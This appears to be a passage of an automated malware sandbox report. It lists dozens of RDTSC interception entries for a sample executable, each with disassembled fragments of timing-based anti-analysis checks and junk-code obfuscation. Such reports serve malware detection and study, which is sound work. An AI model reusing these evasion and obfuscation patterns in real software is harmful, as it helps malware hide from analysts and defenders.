                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C5476 second address: 8C547E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C55BA second address: 8C55C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C55C0 second address: 8C55EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C45142A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA1C45142A5h 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C55EE second address: 8C5600 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA1C54A6E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C5600 second address: 8C5615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C45142A1h 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C5615 second address: 8C5627 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FA1C54A6E96h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C65EC second address: 8C661B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 1F099AC2h 0x0000000d push edx 0x0000000e mov edi, dword ptr [ebp+122D3969h] 0x00000014 pop edi 0x00000015 call 00007FA1C4514299h 0x0000001a jmp 00007FA1C451429Bh 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C661B second address: 8C6622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C6622 second address: 8C6628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C6998 second address: 8C699C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C721C second address: 8C7220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C7394 second address: 8C739A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C739A second address: 8C739E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C7859 second address: 8C7868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1C54A6E9Bh 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C880C second address: 8C8833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA1C451429Ch 0x0000000a jnp 00007FA1C4514296h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push edi 0x00000014 jmp 00007FA1C451429Fh 0x00000019 pop edi 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CADE1 second address: 8CADEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CADEC second address: 8CADF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CADF0 second address: 8CADF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CADF4 second address: 8CAE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FA1C4514296h 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CAE05 second address: 8CAE09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CAE09 second address: 8CAE17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FA1C4514296h 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CAE17 second address: 8CAE81 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA1C54A6E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FA1C54A6E98h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 mov edi, dword ptr [ebp+122D388Dh] 0x0000002c sub dword ptr [ebp+1244CC0Ch], edx 0x00000032 push 00000000h 0x00000034 mov di, bx 0x00000037 add esi, dword ptr [ebp+122D3A51h] 0x0000003d push 00000000h 0x0000003f jmp 00007FA1C54A6EA6h 0x00000044 push eax 0x00000045 pushad 0x00000046 pushad 0x00000047 jo 00007FA1C54A6E96h 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CAE81 second address: 8CAE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FA1C4514296h 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CAE8E second address: 8CAE92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CC50E second address: 8CC52E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA1C45142A5h 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CC2CD second address: 8CC2F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FA1C54A6E9Ch 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CC52E second address: 8CC534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CC2F7 second address: 8CC2FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CCEB2 second address: 8CCF50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C45142A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007FA1C45142A5h 0x00000010 push edx 0x00000011 jmp 00007FA1C451429Dh 0x00000016 pop edx 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FA1C4514298h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 call 00007FA1C451429Dh 0x00000037 js 00007FA1C45142A7h 0x0000003d jmp 00007FA1C45142A1h 0x00000042 pop esi 0x00000043 jmp 00007FA1C45142A0h 0x00000048 push 00000000h 0x0000004a mov di, dx 0x0000004d add esi, 00CB76AAh 0x00000053 push 00000000h 0x00000055 mov si, ax 0x00000058 xchg eax, ebx 0x00000059 push ecx 0x0000005a push eax 0x0000005b push edx 0x0000005c ja 00007FA1C4514296h 0x00000062 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CCC6E second address: 8CCC7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jnp 00007FA1C54A6E96h 0x00000010 pop eax 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CCF50 second address: 8CCF77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C45142A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FA1C451429Ch 0x00000013 jo 00007FA1C4514296h 0x00000019 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8D0E0A second address: 8D0E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8D13A7 second address: 8D13FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FA1C45142A0h 0x0000000c nop 0x0000000d sub dword ptr [ebp+122D3126h], eax 0x00000013 push 00000000h 0x00000015 mov edi, dword ptr [ebp+12450EC5h] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FA1C4514298h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 mov di, si 0x0000003a mov dword ptr [ebp+122D2755h], edi 0x00000040 xchg eax, esi 0x00000041 pushad 0x00000042 push ebx 0x00000043 push edi 0x00000044 pop edi 0x00000045 pop ebx 0x00000046 push esi 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8D13FD second address: 8D140A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edi 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8D140A second address: 8D1426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1C45142A8h 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8D155E second address: 8D1564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8D33CD second address: 8D33D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8D163D second address: 8D1641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8D33D2 second address: 8D343C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1C45142A9h 0x00000008 jmp 00007FA1C451429Dh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov bl, 5Ah 0x00000015 mov ebx, esi 0x00000017 push 00000000h 0x00000019 sub dword ptr [ebp+12450B77h], eax 0x0000001f jmp 00007FA1C45142A5h 0x00000024 push 00000000h 0x00000026 mov bx, 5869h 0x0000002a push eax 0x0000002b pushad 0x0000002c jmp 00007FA1C451429Eh 0x00000031 push eax 0x00000032 push edx 0x00000033 push edx 0x00000034 pop edx 0x00000035 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 882A66 second address: 882A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C54A6EA3h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007FA1C54A6E96h 0x00000013 jmp 00007FA1C54A6EA3h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8D450B second address: 8D4515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FA1C4514296h 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 882A9C second address: 882AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 882AA1 second address: 882ABF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FA1C4514296h 0x00000009 jmp 00007FA1C45142A3h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8D6B61 second address: 8D6B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8D6B69 second address: 8D6B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8D8998 second address: 8D89AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA1C54A6E9Dh 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8D6B6F second address: 8D6B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8D89AD second address: 8D8A46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007FA1C54A6E9Ah 0x00000012 mov bx, di 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FA1C54A6E98h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 jmp 00007FA1C54A6E9Bh 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007FA1C54A6E98h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 clc 0x00000053 add edi, dword ptr [ebp+122D3861h] 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push ecx 0x0000005d jmp 00007FA1C54A6EA6h 0x00000062 pop ecx 0x00000063 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8D6B7B second address: 8D6B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8D6B7F second address: 8D6B83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8DA87C second address: 8DA886 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8DA886 second address: 8DA88A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8DA88A second address: 8DA923 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FA1C4514298h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push eax 0x00000023 jmp 00007FA1C45142A6h 0x00000028 pop edi 0x00000029 call 00007FA1C451429Dh 0x0000002e and ebx, 6D83CE52h 0x00000034 pop edi 0x00000035 push 00000000h 0x00000037 mov ebx, dword ptr [ebp+122D3B2Dh] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FA1C4514298h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 0000001Bh 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 mov ebx, dword ptr [ebp+122D393Dh] 0x0000005f xchg eax, esi 0x00000060 jg 00007FA1C451429Eh 0x00000066 push eax 0x00000067 push edi 0x00000068 pushad 0x00000069 pushad 0x0000006a popad 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8DBADA second address: 8DBB00 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA1C54A6EA7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jo 00007FA1C54A6E96h 0x00000014 pop ebx 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8DCA5D second address: 8DCA61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8D9AE5 second address: 8D9AE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8E08CF second address: 8E08DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8E08DC second address: 8E0944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop esi 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FA1C54A6E98h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 clc 0x00000026 stc 0x00000027 push 00000000h 0x00000029 mov di, F037h 0x0000002d push 00000000h 0x0000002f xor dword ptr [ebp+122D2513h], edi 0x00000035 ja 00007FA1C54A6E9Ch 0x0000003b xchg eax, esi 0x0000003c jmp 00007FA1C54A6EA6h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8E0944 second address: 8E0948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8E0948 second address: 8E0952 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1C54A6E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8E184C second address: 8E1856 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA1C4514296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8E87DF second address: 8E87E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8EA2D6 second address: 8EA2DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8EA2DD second address: 8EA31F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FA1C54A6E96h 0x00000009 jng 00007FA1C54A6E96h 0x0000000f jo 00007FA1C54A6E96h 0x00000015 popad 0x00000016 jmp 00007FA1C54A6EA2h 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jnc 00007FA1C54A6EA6h 0x00000025 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8EA31F second address: 8EA330 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007FA1C4514296h 0x0000000b pop esi 0x0000000c push ecx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8EB949 second address: 8EB95D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FA1C54A6E96h 0x0000000a jmp 00007FA1C54A6E9Ah 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F102A second address: 8F102E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F109E second address: 8F10A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA1C54A6E96h 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F1251 second address: 8F128F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push ecx 0x0000000d ja 00007FA1C4514296h 0x00000013 pop ecx 0x00000014 pop eax 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007FA1C451429Bh 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 pushad 0x00000021 pushad 0x00000022 jmp 00007FA1C45142A4h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F448A second address: 8F4490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
